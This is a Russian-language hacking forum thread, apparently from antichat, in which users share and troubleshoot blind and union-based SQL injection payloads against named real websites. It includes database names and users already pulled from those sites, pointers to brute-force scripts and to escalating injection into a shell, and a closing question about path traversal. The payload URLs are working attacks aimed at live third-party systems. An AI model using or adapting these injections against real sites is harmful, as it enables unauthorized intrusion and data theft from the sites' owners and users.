2 diznt blind sql injection version: 4.1.22-log database : frutony3_fn user : frutony3_fn@localhost http://frutonyanya.ru/php/news.php?n=25&c=49+AND+ASCII(SUBSTRING((select+user()),1,1))>x
https://forum.antichat.ru/showpost.php?p=966458&postcount=3908 советую забить на скулю доступа к information_schema нет //add а ну да не обратил внимания на ветку=) 4.1
[MySQL/SQL-inj] SQL injection полный FAQТам же скрипты для вывода всех записей из таблицы, брута имен столбцов и полей. SQL injection полный FAQ: системные переменныеSQL injection полный FAQ: прелести двойного запросаВообще очень и очень полезная вещь, прошу особенно обратить внимание на неё - случаи когда права на файлы у пользователя БД есть, но кавычки экранируются более чем частые. И как показывает практика найти, читая сорцы найти, уязвимый запрос, данные из которого подставляются в другой запрос, более чем реально, а результат шелл. Так же имейте ввиду что иногда, данные из запроса подставляются в функции include() или eval() - тут надо следить за выводом ошибок при SQL инъекции. Новая SQL Injection Tool 4 SQL инъекция (в т.ч. и blind SQL)SQL инъекция (в т.ч. и blind SQL): Работа с инъекциями в MySQL третьей версии.SQL инъекция (в т.ч. и blind SQL): Скрипт для работы со слепыми инъекциями.Там же можно найти словари для брута имён таблиц и колонок, а вот и ещё: SQL databases[antichat] sql4 dictionaryИмена таблиц Новая альтернатива Benchmark'y или эффективный blind SQL-injectionСправочное руководство по MySQLМануалы с офф сайта (English), по версиям: 3.23, 4.0, 4.1 5.0 5.1 6.0 by Grey
Code: http://arainia.com/software/gizmo/overview.php?nID=4 Как эту расскрутить... Остановился на 20 столбцах, пишет что мало...
2 mailbrush по мне , так опять блинд Version : 4.1.22-standard Database : arainia_members User : arainia_members@localhost http://arainia.com/software/gizmo/overview.php?nID=4 AND ASCII(SUBSTRING((select+user() ),1,1))=x/
2 mailbrush вывода тм нет, на то она и есть слепая скуля что вывода нет. http://www.eu-gateway.eu/go.php?nID=-9' тоже слепуха, читай про блинды
Только что прочитал... Вроде подставил, но всеравно та же ошибка - Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource. Подставлял: Code: http://www.eu-gateway.eu/go.php?nID=-9+OR+nID=IF(ASCII(SUBSTRING((SELECT+USER()),1,1)=254,1,0) Что не так?
http://www.eu-gateway.eu/go.php?nID=2+and+1=if(substring((select+version()),3,1)=0,1,(select+1+union+select+2))/* версия 4.1
Code: http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+version(),2,3-- Вывод в исходной.
Code: http://www.tv3russia.ru/mysticism/programs/programs_310/foto/photo.php?id4[]=1329 Вроде бы и скуля... а вроде и нет... подскажите)
Походу когда делаешь массивом проходится проверка на пустое значения, ну а потом например идет int() от масива даст '' и в гверю идет пустое значения, возможно.
Это ошибка скул запроса. id4=1329 определяет переменную id4 и присваивает ей значение. id4[]=1329 определяет массив id4[0]=1329. Далее идет запрос примерно такой select count(*) as CNT from VOICES_TO_PHOTO where CLIENT_ID='ip' and PHOTO_ID=id4 в первом случае это возвращает правильный результат. Во втором случае подставляется массив и вызывается ошибка.
не скуля) переменная id4 хорошо фильтруется. Тут фишка в том, что при id4[]=1329 в запрос идёт строка 'Array' и значение 1329 записывается в переменную id4[0].
Можно ли пролистать другой диск-драйв через подобие командной строки командой dir? К примеру программа находитцо в папке C:\samas\sam2\, значит к корню: "dir ./../../../ /". Использование: "dir {путь} {тип поиска}". Тупое прописывание буквы диска не проканает, можно использовать только короткие имена (6n~1). Не уверен что это возможно, но мало ли кто дельное предложит.
